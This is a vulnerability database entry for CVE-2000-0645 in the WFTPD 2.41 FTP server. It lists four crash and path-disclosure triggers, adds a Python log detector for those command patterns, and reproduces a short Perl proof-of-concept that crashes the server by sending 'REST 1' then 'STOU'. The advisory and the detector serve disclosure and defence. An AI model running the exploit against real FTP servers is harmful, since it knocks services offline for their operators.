WFTPD 2.4.1RC11 Multiple Vulnerabilities

Vulnerability ID: 1105935  Vulnerability type: Input validation
Published: 2000-07-21  Updated: 2005-10-20
CVE ID: CVE-2000-0645
CNNVD-ID: CNNVD-200007-060
Platform: Windows  CVSS score: 6.4
|Vulnerability source
https://www.exploit-db.com/exploits/20101
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200007-060
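|Vulnerability details
WFTPD and WFTPD Pro 2.41 contain a vulnerability. A remote attacker can cause a denial of service by using the RESTART (REST) command to write past the end of a file, or to write to a non-existent file, via commands such as STORE UNIQUE (STOU), STORE (STOR), or APPEND (APPE).
|Exploit (EXP)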
source: http://www.securityfocus.com/bid/1506/info
 
WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.
 
1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existent file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.
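
The four command patterns listed above can be searched for in FTP command logs. The following Python detector is an added example, not part of the original advisory or of WFTPD; the log format (`<session> <C|S> <text>`), the session ids and the `detect` function are assumptions, and the sample lines are constructed.

```python
import re

# Constructed sample log, assumed format "<session> <C|S> <text>"; not real traffic.
SAMPLE_LOG = """\
s1 S 230 Logged in
s1 C REST 1
s1 C STOU
s2 C MLST
s3 S 230 Logged in
s3 C LIST
s3 S 150 Opening data connection
s3 C STAT
s3 S 226 Transfer complete
s3 C STAT
s4 S 230 Logged in
s4 C REST 0
s4 C STOR report.txt
"""

UPLOADS = {"STOU", "STOR", "APPE"}
TRANSFERS = UPLOADS | {"LIST", "RETR"}

def detect(log_text):
    """Return (session, finding) pairs for the command patterns in the advisory."""
    findings, state = [], {}
    for raw in log_text.splitlines():
        m = re.match(r"(\S+) ([CS]) (\S+) ?(.*)", raw)
        if not m:
            continue
        sid, side, word, arg = m.groups()
        st = state.setdefault(sid, {"auth": False, "rest": 0, "busy": False})
        if side == "S":  # server reply: track login and end of transfer
            if word == "230":
                st["auth"] = True
            elif word == "226" or word[0] in "45":
                st["busy"] = False
            continue
        verb = word.upper()
        if verb == "MLST" and not st["auth"]:
            findings.append((sid, "MLST before login"))
        if verb == "STAT" and st["busy"]:
            findings.append((sid, "STAT during transfer"))
        # Heuristic: a log cannot show file size, so flag any non-zero REST + upload.
        if verb in UPLOADS and st["rest"] > 0:
            findings.append((sid, "REST %d then %s" % (st["rest"], verb)))
        st["rest"] = int(arg) if verb == "REST" and arg.isdigit() else 0
        if verb in TRANSFERS:
            st["busy"] = True
    return findings
```

Issues 1 and 3 share the same trigger, so both surface as "STAT during transfer".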

================================================================
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)

[email protected]
http://bluepanda.box.sk/
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #2
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#

use IO::Socket;

$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p@nda";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

print $socket "USER $user\nPASS $pass\nREST 1\nSTOU\n";

# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
close($socket);
print "\nConnection closed. Finished.\n";
|References

Source: BID
Name: 1506
Link: http://www.securityfocus.com/bid/1506
Source: BUGTRAQ
Name: 20000721 WFTPD/WFTPD Pro 2.41 RC11 vulnerabilities.
Link: http://archives.neohapsis.com/archives/bugtraq/2000-07/0295.html